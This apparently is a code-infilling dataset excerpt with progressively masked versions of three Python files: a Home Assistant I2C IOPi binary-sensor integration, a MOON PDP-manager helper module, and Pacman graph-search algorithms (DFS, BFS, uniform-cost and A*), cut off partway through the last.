<|reserved_special_token_0|>
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Set up the abelectronicsiopi binary sensors."""
pull_mode = config[CONF_PULL_MODE]
invert_logic = config[CONF_INVERT_LOGIC]
iopi = IOPi(config.get(CONF_I2C_ADDRESS), True)
binary_sensors = []
pins = config[CONF_PINS]
for pin_num, pin_name in pins.items():
binary_sensors.append(abelectronicsiopiBinarySensor(pin_name,
pin_num, pull_mode, invert_logic, iopi))
add_devices(binary_sensors, True)
class abelectronicsiopiBinarySensor(BinarySensorEntity):
"""Represent a binary sensor that uses abelectronicsiopi."""
iobus = None
targetpin = None
_state = False
def __init__(self, pinname, pin, pull_mode, invert_logic, bus):
"""Initialize the pin."""
self._state = None
self._name = pinname
self.targetpin = pin
self.iobus = bus
if pull_mode == True:
self.iobus.set_pin_pullup(self.targetpin, 1)
else:
self.iobus.set_pin_pullup(self.targetpin, 0)
self.iobus.set_pin_direction(self.targetpin, 1)
if invert_logic == True:
self.iobus.invert_pin(self.targetpin, 1)
else:
self.iobus.invert_pin(self.targetpin, 0)
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def is_on(self):
"""Return the state of the entity."""
self._state = self.iobus.read_pin(self.targetpin)
return self._state
def update(self):
"""Update the GPIO state."""
self._state = self.iobus.read_pin(self.targetpin)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from custom_components.abelectronicsiopi.IOPi import IOPi
import voluptuous as vol
from homeassistant.components.binary_sensor import PLATFORM_SCHEMA, BinarySensorEntity
from homeassistant.const import DEVICE_DEFAULT_NAME
import homeassistant.helpers.config_validation as cv
CONF_INVERT_LOGIC = 'invert_logic'
CONF_I2C_ADDRESS = 'i2c_address'
CONF_PINS = 'pins'
CONF_PULL_MODE = 'pull_mode'
DEFAULT_INVERT_LOGIC = False
DEFAULT_I2C_ADDRESS = 32
DEFAULT_PULL_MODE = True
_SENSORS_SCHEMA = vol.Schema({cv.positive_int: cv.string})
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({vol.Required(CONF_PINS):
_SENSORS_SCHEMA, vol.Optional(CONF_INVERT_LOGIC, default=
DEFAULT_INVERT_LOGIC): cv.boolean, vol.Optional(CONF_PULL_MODE, default
=DEFAULT_PULL_MODE): cv.boolean, vol.Optional(CONF_I2C_ADDRESS, default
=DEFAULT_I2C_ADDRESS): vol.Coerce(int)})
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Set up the abelectronicsiopi binary sensors."""
pull_mode = config[CONF_PULL_MODE]
invert_logic = config[CONF_INVERT_LOGIC]
iopi = IOPi(config.get(CONF_I2C_ADDRESS), True)
binary_sensors = []
pins = config[CONF_PINS]
for pin_num, pin_name in pins.items():
binary_sensors.append(abelectronicsiopiBinarySensor(pin_name,
pin_num, pull_mode, invert_logic, iopi))
add_devices(binary_sensors, True)
class abelectronicsiopiBinarySensor(BinarySensorEntity):
"""Represent a binary sensor that uses abelectronicsiopi."""
iobus = None
targetpin = None
_state = False
def __init__(self, pinname, pin, pull_mode, invert_logic, bus):
"""Initialize the pin."""
self._state = None
self._name = pinname
self.targetpin = pin
self.iobus = bus
if pull_mode == True:
self.iobus.set_pin_pullup(self.targetpin, 1)
else:
self.iobus.set_pin_pullup(self.targetpin, 0)
self.iobus.set_pin_direction(self.targetpin, 1)
if invert_logic == True:
self.iobus.invert_pin(self.targetpin, 1)
else:
self.iobus.invert_pin(self.targetpin, 0)
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def is_on(self):
"""Return the state of the entity."""
self._state = self.iobus.read_pin(self.targetpin)
return self._state
def update(self):
"""Update the GPIO state."""
self._state = self.iobus.read_pin(self.targetpin)
<|reserved_special_token_1|>
"""Support for binary sensor using I2C abelectronicsiopi chip."""
from custom_components.abelectronicsiopi.IOPi import IOPi
import voluptuous as vol
from homeassistant.components.binary_sensor import PLATFORM_SCHEMA, BinarySensorEntity
from homeassistant.const import DEVICE_DEFAULT_NAME
import homeassistant.helpers.config_validation as cv
CONF_INVERT_LOGIC = "invert_logic"
CONF_I2C_ADDRESS = "i2c_address"
CONF_PINS = "pins"
CONF_PULL_MODE = "pull_mode"
DEFAULT_INVERT_LOGIC = False
DEFAULT_I2C_ADDRESS = 0x20
DEFAULT_PULL_MODE = True
_SENSORS_SCHEMA = vol.Schema({cv.positive_int: cv.string})
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_PINS): _SENSORS_SCHEMA,
vol.Optional(CONF_INVERT_LOGIC, default=DEFAULT_INVERT_LOGIC): cv.boolean,
vol.Optional(CONF_PULL_MODE, default=DEFAULT_PULL_MODE): cv.boolean,
vol.Optional(CONF_I2C_ADDRESS, default=DEFAULT_I2C_ADDRESS): vol.Coerce(int),
}
)
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Set up the abelectronicsiopi binary sensors."""
pull_mode = config[CONF_PULL_MODE]
invert_logic = config[CONF_INVERT_LOGIC]
iopi = IOPi(config.get(CONF_I2C_ADDRESS), True)
binary_sensors = []
pins = config[CONF_PINS]
for pin_num, pin_name in pins.items():
binary_sensors.append(abelectronicsiopiBinarySensor(pin_name, pin_num, pull_mode, invert_logic, iopi))
add_devices(binary_sensors, True)
class abelectronicsiopiBinarySensor(BinarySensorEntity):
"""Represent a binary sensor that uses abelectronicsiopi."""
iobus = None
targetpin = None
_state = False
def __init__(self, pinname, pin, pull_mode, invert_logic, bus):
"""Initialize the pin."""
self._state = None
self._name = pinname
self.targetpin = pin
self.iobus = bus
if pull_mode == True:
self.iobus.set_pin_pullup(self.targetpin, 1)
else:
self.iobus.set_pin_pullup(self.targetpin, 0)
self.iobus.set_pin_direction(self.targetpin, 1)
if invert_logic == True:
self.iobus.invert_pin(self.targetpin, 1)
else:
self.iobus.invert_pin(self.targetpin, 0)
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def is_on(self):
"""Return the state of the entity."""
self._state = self.iobus.read_pin(self.targetpin)
return self._state
def update(self):
"""Update the GPIO state."""
self._state = self.iobus.read_pin(self.targetpin)
|
flexible
|
{
"blob_id": "73d056d4ab0d268841156b21dfc2c54b5fb2f5f1",
"index": 5218,
"step-1": "<mask token>\n\n\nclass abelectronicsiopiBinarySensor(BinarySensorEntity):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, pinname, pin, pull_mode, invert_logic, bus):\n \"\"\"Initialize the pin.\"\"\"\n self._state = None\n self._name = pinname\n self.targetpin = pin\n self.iobus = bus\n if pull_mode == True:\n self.iobus.set_pin_pullup(self.targetpin, 1)\n else:\n self.iobus.set_pin_pullup(self.targetpin, 0)\n self.iobus.set_pin_direction(self.targetpin, 1)\n if invert_logic == True:\n self.iobus.invert_pin(self.targetpin, 1)\n else:\n self.iobus.invert_pin(self.targetpin, 0)\n\n @property\n def name(self):\n \"\"\"Return the name of the sensor.\"\"\"\n return self._name\n\n @property\n def is_on(self):\n \"\"\"Return the state of the entity.\"\"\"\n self._state = self.iobus.read_pin(self.targetpin)\n return self._state\n\n def update(self):\n \"\"\"Update the GPIO state.\"\"\"\n self._state = self.iobus.read_pin(self.targetpin)\n",
"step-2": "<mask token>\n\n\nclass abelectronicsiopiBinarySensor(BinarySensorEntity):\n \"\"\"Represent a binary sensor that uses abelectronicsiopi.\"\"\"\n iobus = None\n targetpin = None\n _state = False\n\n def __init__(self, pinname, pin, pull_mode, invert_logic, bus):\n \"\"\"Initialize the pin.\"\"\"\n self._state = None\n self._name = pinname\n self.targetpin = pin\n self.iobus = bus\n if pull_mode == True:\n self.iobus.set_pin_pullup(self.targetpin, 1)\n else:\n self.iobus.set_pin_pullup(self.targetpin, 0)\n self.iobus.set_pin_direction(self.targetpin, 1)\n if invert_logic == True:\n self.iobus.invert_pin(self.targetpin, 1)\n else:\n self.iobus.invert_pin(self.targetpin, 0)\n\n @property\n def name(self):\n \"\"\"Return the name of the sensor.\"\"\"\n return self._name\n\n @property\n def is_on(self):\n \"\"\"Return the state of the entity.\"\"\"\n self._state = self.iobus.read_pin(self.targetpin)\n return self._state\n\n def update(self):\n \"\"\"Update the GPIO state.\"\"\"\n self._state = self.iobus.read_pin(self.targetpin)\n",
"step-3": "<mask token>\n\n\ndef setup_platform(hass, config, add_devices, discovery_info=None):\n \"\"\"Set up the abelectronicsiopi binary sensors.\"\"\"\n pull_mode = config[CONF_PULL_MODE]\n invert_logic = config[CONF_INVERT_LOGIC]\n iopi = IOPi(config.get(CONF_I2C_ADDRESS), True)\n binary_sensors = []\n pins = config[CONF_PINS]\n for pin_num, pin_name in pins.items():\n binary_sensors.append(abelectronicsiopiBinarySensor(pin_name,\n pin_num, pull_mode, invert_logic, iopi))\n add_devices(binary_sensors, True)\n\n\nclass abelectronicsiopiBinarySensor(BinarySensorEntity):\n \"\"\"Represent a binary sensor that uses abelectronicsiopi.\"\"\"\n iobus = None\n targetpin = None\n _state = False\n\n def __init__(self, pinname, pin, pull_mode, invert_logic, bus):\n \"\"\"Initialize the pin.\"\"\"\n self._state = None\n self._name = pinname\n self.targetpin = pin\n self.iobus = bus\n if pull_mode == True:\n self.iobus.set_pin_pullup(self.targetpin, 1)\n else:\n self.iobus.set_pin_pullup(self.targetpin, 0)\n self.iobus.set_pin_direction(self.targetpin, 1)\n if invert_logic == True:\n self.iobus.invert_pin(self.targetpin, 1)\n else:\n self.iobus.invert_pin(self.targetpin, 0)\n\n @property\n def name(self):\n \"\"\"Return the name of the sensor.\"\"\"\n return self._name\n\n @property\n def is_on(self):\n \"\"\"Return the state of the entity.\"\"\"\n self._state = self.iobus.read_pin(self.targetpin)\n return self._state\n\n def update(self):\n \"\"\"Update the GPIO state.\"\"\"\n self._state = self.iobus.read_pin(self.targetpin)\n",
"step-4": "<mask token>\nfrom custom_components.abelectronicsiopi.IOPi import IOPi\nimport voluptuous as vol\nfrom homeassistant.components.binary_sensor import PLATFORM_SCHEMA, BinarySensorEntity\nfrom homeassistant.const import DEVICE_DEFAULT_NAME\nimport homeassistant.helpers.config_validation as cv\nCONF_INVERT_LOGIC = 'invert_logic'\nCONF_I2C_ADDRESS = 'i2c_address'\nCONF_PINS = 'pins'\nCONF_PULL_MODE = 'pull_mode'\nDEFAULT_INVERT_LOGIC = False\nDEFAULT_I2C_ADDRESS = 32\nDEFAULT_PULL_MODE = True\n_SENSORS_SCHEMA = vol.Schema({cv.positive_int: cv.string})\nPLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({vol.Required(CONF_PINS):\n _SENSORS_SCHEMA, vol.Optional(CONF_INVERT_LOGIC, default=\n DEFAULT_INVERT_LOGIC): cv.boolean, vol.Optional(CONF_PULL_MODE, default\n =DEFAULT_PULL_MODE): cv.boolean, vol.Optional(CONF_I2C_ADDRESS, default\n =DEFAULT_I2C_ADDRESS): vol.Coerce(int)})\n\n\ndef setup_platform(hass, config, add_devices, discovery_info=None):\n \"\"\"Set up the abelectronicsiopi binary sensors.\"\"\"\n pull_mode = config[CONF_PULL_MODE]\n invert_logic = config[CONF_INVERT_LOGIC]\n iopi = IOPi(config.get(CONF_I2C_ADDRESS), True)\n binary_sensors = []\n pins = config[CONF_PINS]\n for pin_num, pin_name in pins.items():\n binary_sensors.append(abelectronicsiopiBinarySensor(pin_name,\n pin_num, pull_mode, invert_logic, iopi))\n add_devices(binary_sensors, True)\n\n\nclass abelectronicsiopiBinarySensor(BinarySensorEntity):\n \"\"\"Represent a binary sensor that uses abelectronicsiopi.\"\"\"\n iobus = None\n targetpin = None\n _state = False\n\n def __init__(self, pinname, pin, pull_mode, invert_logic, bus):\n \"\"\"Initialize the pin.\"\"\"\n self._state = None\n self._name = pinname\n self.targetpin = pin\n self.iobus = bus\n if pull_mode == True:\n self.iobus.set_pin_pullup(self.targetpin, 1)\n else:\n self.iobus.set_pin_pullup(self.targetpin, 0)\n self.iobus.set_pin_direction(self.targetpin, 1)\n if invert_logic == True:\n self.iobus.invert_pin(self.targetpin, 1)\n else:\n self.iobus.invert_pin(self.targetpin, 0)\n\n @property\n def name(self):\n \"\"\"Return the name of the sensor.\"\"\"\n return self._name\n\n @property\n def is_on(self):\n \"\"\"Return the state of the entity.\"\"\"\n self._state = self.iobus.read_pin(self.targetpin)\n return self._state\n\n def update(self):\n \"\"\"Update the GPIO state.\"\"\"\n self._state = self.iobus.read_pin(self.targetpin)\n",
"step-5": "\"\"\"Support for binary sensor using I2C abelectronicsiopi chip.\"\"\"\r\nfrom custom_components.abelectronicsiopi.IOPi import IOPi\r\nimport voluptuous as vol\r\n\r\nfrom homeassistant.components.binary_sensor import PLATFORM_SCHEMA, BinarySensorEntity\r\nfrom homeassistant.const import DEVICE_DEFAULT_NAME\r\nimport homeassistant.helpers.config_validation as cv\r\n\r\nCONF_INVERT_LOGIC = \"invert_logic\"\r\nCONF_I2C_ADDRESS = \"i2c_address\"\r\nCONF_PINS = \"pins\"\r\nCONF_PULL_MODE = \"pull_mode\"\r\n\r\nDEFAULT_INVERT_LOGIC = False\r\nDEFAULT_I2C_ADDRESS = 0x20\r\nDEFAULT_PULL_MODE = True\r\n\r\n_SENSORS_SCHEMA = vol.Schema({cv.positive_int: cv.string})\r\n\r\nPLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(\r\n {\r\n vol.Required(CONF_PINS): _SENSORS_SCHEMA,\r\n vol.Optional(CONF_INVERT_LOGIC, default=DEFAULT_INVERT_LOGIC): cv.boolean,\r\n vol.Optional(CONF_PULL_MODE, default=DEFAULT_PULL_MODE): cv.boolean,\r\n vol.Optional(CONF_I2C_ADDRESS, default=DEFAULT_I2C_ADDRESS): vol.Coerce(int),\r\n }\r\n)\r\n\r\n\r\ndef setup_platform(hass, config, add_devices, discovery_info=None):\r\n \"\"\"Set up the abelectronicsiopi binary sensors.\"\"\"\r\n pull_mode = config[CONF_PULL_MODE]\r\n invert_logic = config[CONF_INVERT_LOGIC]\r\n\r\n iopi = IOPi(config.get(CONF_I2C_ADDRESS), True)\r\n\r\n binary_sensors = []\r\n pins = config[CONF_PINS]\r\n\r\n for pin_num, pin_name in pins.items():\r\n binary_sensors.append(abelectronicsiopiBinarySensor(pin_name, pin_num, pull_mode, invert_logic, iopi))\r\n add_devices(binary_sensors, True)\r\n\r\n\r\nclass abelectronicsiopiBinarySensor(BinarySensorEntity):\r\n \"\"\"Represent a binary sensor that uses abelectronicsiopi.\"\"\"\r\n\r\n iobus = None\r\n targetpin = None\r\n _state = False\r\n\r\n def __init__(self, pinname, pin, pull_mode, invert_logic, bus):\r\n \"\"\"Initialize the pin.\"\"\"\r\n self._state = None\r\n self._name = pinname\r\n self.targetpin = pin\r\n self.iobus = bus\r\n\r\n if pull_mode == True:\r\n self.iobus.set_pin_pullup(self.targetpin, 1)\r\n else:\r\n self.iobus.set_pin_pullup(self.targetpin, 0)\r\n\r\n self.iobus.set_pin_direction(self.targetpin, 1)\r\n\r\n if invert_logic == True:\r\n self.iobus.invert_pin(self.targetpin, 1)\r\n else:\r\n self.iobus.invert_pin(self.targetpin, 0) \r\n\r\n @property\r\n def name(self):\r\n \"\"\"Return the name of the sensor.\"\"\"\r\n return self._name\r\n\r\n @property\r\n def is_on(self):\r\n \"\"\"Return the state of the entity.\"\"\"\r\n self._state = self.iobus.read_pin(self.targetpin)\r\n return self._state\r\n\r\n def update(self):\r\n \"\"\"Update the GPIO state.\"\"\"\r\n self._state = self.iobus.read_pin(self.targetpin)\r\n",
"step-ids": [
5,
7,
8,
10,
11
]
}
|
[
5,
7,
8,
10,
11
] |
<|reserved_special_token_0|>
def delete_pdp(pdp_id):
from moon_manager.db_driver import PDPManager
PDPManager.delete_pdp('', pdp_id)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def delete_pdp(pdp_id):
from moon_manager.db_driver import PDPManager
PDPManager.delete_pdp('', pdp_id)
def add_pdp(pdp_id=None, value=None):
from moon_manager.db_driver import PDPManager
return PDPManager.add_pdp('', pdp_id, value)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def delete_pdp(pdp_id):
from moon_manager.db_driver import PDPManager
PDPManager.delete_pdp('', pdp_id)
def add_pdp(pdp_id=None, value=None):
from moon_manager.db_driver import PDPManager
return PDPManager.add_pdp('', pdp_id, value)
def get_pdp(pdp_id=None):
from moon_manager.db_driver import PDPManager
return PDPManager.get_pdp('', pdp_id)
<|reserved_special_token_1|>
def update_pdp(pdp_id, value):
from moon_manager.db_driver import PDPManager
return PDPManager.update_pdp('', pdp_id, value)
def delete_pdp(pdp_id):
from moon_manager.db_driver import PDPManager
PDPManager.delete_pdp('', pdp_id)
def add_pdp(pdp_id=None, value=None):
from moon_manager.db_driver import PDPManager
return PDPManager.add_pdp('', pdp_id, value)
def get_pdp(pdp_id=None):
from moon_manager.db_driver import PDPManager
return PDPManager.get_pdp('', pdp_id)
<|reserved_special_token_1|>
# Software Name: MOON
# Version: 5.4
# SPDX-FileCopyrightText: Copyright (c) 2018-2020 Orange and its contributors
# SPDX-License-Identifier: Apache-2.0
# This software is distributed under the 'Apache License 2.0',
# the text of which is available at 'http://www.apache.org/licenses/LICENSE-2.0.txt'
# or see the "LICENSE" file for more details.
def update_pdp(pdp_id, value):
from moon_manager.db_driver import PDPManager
return PDPManager.update_pdp("", pdp_id, value)
def delete_pdp(pdp_id):
from moon_manager.db_driver import PDPManager
PDPManager.delete_pdp("", pdp_id)
def add_pdp(pdp_id=None, value=None):
from moon_manager.db_driver import PDPManager
return PDPManager.add_pdp("", pdp_id, value)
def get_pdp(pdp_id=None):
from moon_manager.db_driver import PDPManager
return PDPManager.get_pdp("", pdp_id)
|
flexible
|
{
"blob_id": "af35075eaca9bba3d6bdb73353eaf944869cdede",
"index": 799,
"step-1": "<mask token>\n\n\ndef delete_pdp(pdp_id):\n from moon_manager.db_driver import PDPManager\n PDPManager.delete_pdp('', pdp_id)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef delete_pdp(pdp_id):\n from moon_manager.db_driver import PDPManager\n PDPManager.delete_pdp('', pdp_id)\n\n\ndef add_pdp(pdp_id=None, value=None):\n from moon_manager.db_driver import PDPManager\n return PDPManager.add_pdp('', pdp_id, value)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef delete_pdp(pdp_id):\n from moon_manager.db_driver import PDPManager\n PDPManager.delete_pdp('', pdp_id)\n\n\ndef add_pdp(pdp_id=None, value=None):\n from moon_manager.db_driver import PDPManager\n return PDPManager.add_pdp('', pdp_id, value)\n\n\ndef get_pdp(pdp_id=None):\n from moon_manager.db_driver import PDPManager\n return PDPManager.get_pdp('', pdp_id)\n",
"step-4": "def update_pdp(pdp_id, value):\n from moon_manager.db_driver import PDPManager\n return PDPManager.update_pdp('', pdp_id, value)\n\n\ndef delete_pdp(pdp_id):\n from moon_manager.db_driver import PDPManager\n PDPManager.delete_pdp('', pdp_id)\n\n\ndef add_pdp(pdp_id=None, value=None):\n from moon_manager.db_driver import PDPManager\n return PDPManager.add_pdp('', pdp_id, value)\n\n\ndef get_pdp(pdp_id=None):\n from moon_manager.db_driver import PDPManager\n return PDPManager.get_pdp('', pdp_id)\n",
"step-5": "# Software Name: MOON\n\n# Version: 5.4\n\n# SPDX-FileCopyrightText: Copyright (c) 2018-2020 Orange and its contributors\n# SPDX-License-Identifier: Apache-2.0\n\n# This software is distributed under the 'Apache License 2.0',\n# the text of which is available at 'http://www.apache.org/licenses/LICENSE-2.0.txt'\n# or see the \"LICENSE\" file for more details.\n\n\n\ndef update_pdp(pdp_id, value):\n from moon_manager.db_driver import PDPManager\n return PDPManager.update_pdp(\"\", pdp_id, value)\n\n\ndef delete_pdp(pdp_id):\n from moon_manager.db_driver import PDPManager\n PDPManager.delete_pdp(\"\", pdp_id)\n\n\ndef add_pdp(pdp_id=None, value=None):\n from moon_manager.db_driver import PDPManager\n return PDPManager.add_pdp(\"\", pdp_id, value)\n\n\ndef get_pdp(pdp_id=None):\n from moon_manager.db_driver import PDPManager\n return PDPManager.get_pdp(\"\", pdp_id)\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
class SearchProblem:
"""
This class outlines the structure of a search problem, but doesn't implement
any of the methods (in object-oriented terminology: an abstract class).
You do not need to change anything in this class, ever.
"""
def getStartState(self):
"""
Returns the start state for the search problem
"""
util.raiseNotDefined()
def isGoalState(self, state):
"""
state: Search state
Returns True if and only if the state is a valid goal state
"""
util.raiseNotDefined()
def getSuccessors(self, state):
"""
state: Search state
For a given state, this should return a list of triples,
(successor, action, stepCost), where 'successor' is a
successor to the current state, 'action' is the action
required to get there, and 'stepCost' is the incremental
cost of expanding to that successor
"""
util.raiseNotDefined()
def getCostOfActions(self, actions):
"""
actions: A list of actions to take
This method returns the total cost of a particular sequence of actions. The sequence must
be composed of legal moves
"""
util.raiseNotDefined()
<|reserved_special_token_0|>
def depthFirstSearch(problem):
"""
Search the deepest nodes in the search tree first
Your search algorithm needs to return a list of actions that reaches
the goal. Make sure to implement a graph search algorithm
To get started, you might want to try some of these simple commands to
understand the search problem that is being passed in:
print("Start:", problem.getStartState())
print("Is the start a goal?", problem.isGoalState(problem.getStartState()))
print("Start's successors:", problem.getSuccessors(problem.getStartState()))
"""
"""*** YOUR CODE HERE ***"""
frontier = util.Stack()
visitedStates = []
frontier.push((problem.getStartState(), []))
while not frontier.isEmpty():
currentState, pathTaken = frontier.pop()
if currentState in visitedStates:
continue
if problem.isGoalState(currentState):
return pathTaken
visitedStates.append(currentState)
for coordinates, direction, cost in problem.getSuccessors(currentState
):
if coordinates not in visitedStates:
frontier.push((coordinates, pathTaken + [direction]))
util.raiseNotDefined()
<|reserved_special_token_0|>
def aStarSearch(problem, heuristic=nullHeuristic):
"""Search the node that has the lowest combined cost and heuristic first."""
"""*** YOUR CODE HERE ***"""
frontier = util.PriorityQueue()
visitedStates = []
frontier.push((problem.getStartState(), []), heuristic(problem.
getStartState(), problem))
while not frontier.isEmpty():
currentState, pathTaken = frontier.pop()
if currentState in visitedStates:
continue
if problem.isGoalState(currentState):
return pathTaken
visitedStates.append(currentState)
for coordinates, direction, cost in problem.getSuccessors(currentState
):
if coordinates not in visitedStates:
newCost = problem.getCostOfActions(pathTaken + [direction]
) + heuristic(coordinates, problem)
frontier.push((coordinates, pathTaken + [direction]), newCost)
util.raiseNotDefined()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class SearchProblem:
"""
This class outlines the structure of a search problem, but doesn't implement
any of the methods (in object-oriented terminology: an abstract class).
You do not need to change anything in this class, ever.
"""
def getStartState(self):
"""
Returns the start state for the search problem
"""
util.raiseNotDefined()
def isGoalState(self, state):
"""
state: Search state
Returns True if and only if the state is a valid goal state
"""
util.raiseNotDefined()
def getSuccessors(self, state):
"""
state: Search state
For a given state, this should return a list of triples,
(successor, action, stepCost), where 'successor' is a
successor to the current state, 'action' is the action
required to get there, and 'stepCost' is the incremental
cost of expanding to that successor
"""
util.raiseNotDefined()
def getCostOfActions(self, actions):
"""
actions: A list of actions to take
This method returns the total cost of a particular sequence of actions. The sequence must
be composed of legal moves
"""
util.raiseNotDefined()
def tinyMazeSearch(problem):
"""
Returns a sequence of moves that solves tinyMaze. For any other
maze, the sequence of moves will be incorrect, so only use this for tinyMaze
"""
from game import Directions
s = Directions.SOUTH
w = Directions.WEST
return [s, s, w, s, w, w, s, w]
def depthFirstSearch(problem):
"""
Search the deepest nodes in the search tree first
Your search algorithm needs to return a list of actions that reaches
the goal. Make sure to implement a graph search algorithm
To get started, you might want to try some of these simple commands to
understand the search problem that is being passed in:
print("Start:", problem.getStartState())
print("Is the start a goal?", problem.isGoalState(problem.getStartState()))
print("Start's successors:", problem.getSuccessors(problem.getStartState()))
"""
"""*** YOUR CODE HERE ***"""
frontier = util.Stack()
visitedStates = []
frontier.push((problem.getStartState(), []))
while not frontier.isEmpty():
currentState, pathTaken = frontier.pop()
if currentState in visitedStates:
continue
if problem.isGoalState(currentState):
return pathTaken
visitedStates.append(currentState)
for coordinates, direction, cost in problem.getSuccessors(currentState
):
if coordinates not in visitedStates:
frontier.push((coordinates, pathTaken + [direction]))
util.raiseNotDefined()
<|reserved_special_token_0|>
def uniformCostSearch(problem):
"""Search the node of least total cost first. """
"""*** YOUR CODE HERE ***"""
frontier = util.PriorityQueue()
visitedStates = []
frontier.push((problem.getStartState(), []), 0)
while not frontier.isEmpty():
currentState, pathTaken = frontier.pop()
if currentState in visitedStates:
continue
if problem.isGoalState(currentState):
return pathTaken
visitedStates.append(currentState)
for coordinates, direction, cost in problem.getSuccessors(currentState
):
if coordinates not in visitedStates:
newCost = problem.getCostOfActions(pathTaken + [direction])
frontier.push((coordinates, pathTaken + [direction]), newCost)
util.raiseNotDefined()
<|reserved_special_token_0|>
def aStarSearch(problem, heuristic=nullHeuristic):
"""Search the node that has the lowest combined cost and heuristic first."""
"""*** YOUR CODE HERE ***"""
frontier = util.PriorityQueue()
visitedStates = []
frontier.push((problem.getStartState(), []), heuristic(problem.
getStartState(), problem))
while not frontier.isEmpty():
currentState, pathTaken = frontier.pop()
if currentState in visitedStates:
continue
if problem.isGoalState(currentState):
return pathTaken
visitedStates.append(currentState)
for coordinates, direction, cost in problem.getSuccessors(currentState
):
if coordinates not in visitedStates:
newCost = problem.getCostOfActions(pathTaken + [direction]
) + heuristic(coordinates, problem)
frontier.push((coordinates, pathTaken + [direction]), newCost)
util.raiseNotDefined()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class SearchProblem:
"""
This class outlines the structure of a search problem, but doesn't implement
any of the methods (in object-oriented terminology: an abstract class).
You do not need to change anything in this class, ever.
"""
def getStartState(self):
"""
Returns the start state for the search problem
"""
util.raiseNotDefined()
def isGoalState(self, state):
"""
state: Search state
Returns True if and only if the state is a valid goal state
"""
util.raiseNotDefined()
def getSuccessors(self, state):
"""
state: Search state
For a given state, this should return a list of triples,
(successor, action, stepCost), where 'successor' is a
successor to the current state, 'action' is the action
required to get there, and 'stepCost' is the incremental
cost of expanding to that successor
"""
util.raiseNotDefined()
def getCostOfActions(self, actions):
"""
actions: A list of actions to take
This method returns the total cost of a particular sequence of actions. The sequence must
be composed of legal moves
"""
util.raiseNotDefined()
def tinyMazeSearch(problem):
"""
Returns a sequence of moves that solves tinyMaze. For any other
maze, the sequence of moves will be incorrect, so only use this for tinyMaze
"""
from game import Directions
s = Directions.SOUTH
w = Directions.WEST
return [s, s, w, s, w, w, s, w]
def depthFirstSearch(problem):
"""
Search the deepest nodes in the search tree first
Your search algorithm needs to return a list of actions that reaches
the goal. Make sure to implement a graph search algorithm
To get started, you might want to try some of these simple commands to
understand the search problem that is being passed in:
print("Start:", problem.getStartState())
print("Is the start a goal?", problem.isGoalState(problem.getStartState()))
print("Start's successors:", problem.getSuccessors(problem.getStartState()))
"""
"""*** YOUR CODE HERE ***"""
frontier = util.Stack()
visitedStates = []
frontier.push((problem.getStartState(), []))
while not frontier.isEmpty():
currentState, pathTaken = frontier.pop()
if currentState in visitedStates:
continue
if problem.isGoalState(currentState):
return pathTaken
visitedStates.append(currentState)
for coordinates, direction, cost in problem.getSuccessors(currentState
):
if coordinates not in visitedStates:
frontier.push((coordinates, pathTaken + [direction]))
util.raiseNotDefined()
def breadthFirstSearch(problem):
"""
Search the shallowest nodes in the search tree first.
"""
"""*** YOUR CODE HERE ***"""
frontier = util.Queue()
visitedStates = []
frontier.push((problem.getStartState(), []))
while not frontier.isEmpty():
currentState, pathTaken = frontier.pop()
if currentState in visitedStates:
continue
if problem.isGoalState(currentState):
return pathTaken
visitedStates.append(currentState)
for coordinates, direction, cost in problem.getSuccessors(currentState
):
if coordinates not in visitedStates:
frontier.push((coordinates, pathTaken + [direction]))
util.raiseNotDefined()
def uniformCostSearch(problem):
"""Search the node of least total cost first. """
"""*** YOUR CODE HERE ***"""
frontier = util.PriorityQueue()
visitedStates = []
frontier.push((problem.getStartState(), []), 0)
while not frontier.isEmpty():
currentState, pathTaken = frontier.pop()
if currentState in visitedStates:
continue
if problem.isGoalState(currentState):
return pathTaken
visitedStates.append(currentState)
for coordinates, direction, cost in problem.getSuccessors(currentState
):
if coordinates not in visitedStates:
newCost = problem.getCostOfActions(pathTaken + [direction])
frontier.push((coordinates, pathTaken + [direction]), newCost)
util.raiseNotDefined()
def nullHeuristic(state, problem=None):
"""
A heuristic function estimates the cost from the current state to the nearest
goal in the provided SearchProblem. This heuristic is trivial.
"""
return 0
def aStarSearch(problem, heuristic=nullHeuristic):
"""Search the node that has the lowest combined cost and heuristic first."""
"""*** YOUR CODE HERE ***"""
frontier = util.PriorityQueue()
visitedStates = []
frontier.push((problem.getStartState(), []), heuristic(problem.
getStartState(), problem))
while not frontier.isEmpty():
currentState, pathTaken = frontier.pop()
if currentState in visitedStates:
continue
if problem.isGoalState(currentState):
return pathTaken
visitedStates.append(currentState)
for coordinates, direction, cost in problem.getSuccessors(currentState
):
if coordinates not in visitedStates:
newCost = problem.getCostOfActions(pathTaken + [direction]
) + heuristic(coordinates, problem)
frontier.push((coordinates, pathTaken + [direction]), newCost)
util.raiseNotDefined()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class SearchProblem:
"""
This class outlines the structure of a search problem, but doesn't implement
any of the methods (in object-oriented terminology: an abstract class).
You do not need to change anything in this class, ever.
"""
def getStartState(self):
"""
Returns the start state for the search problem
"""
util.raiseNotDefined()
def isGoalState(self, state):
"""
state: Search state
Returns True if and only if the state is a valid goal state
"""
util.raiseNotDefined()
def getSuccessors(self, state):
"""
state: Search state
For a given state, this should return a list of triples,
(successor, action, stepCost), where 'successor' is a
successor to the current state, 'action' is the action
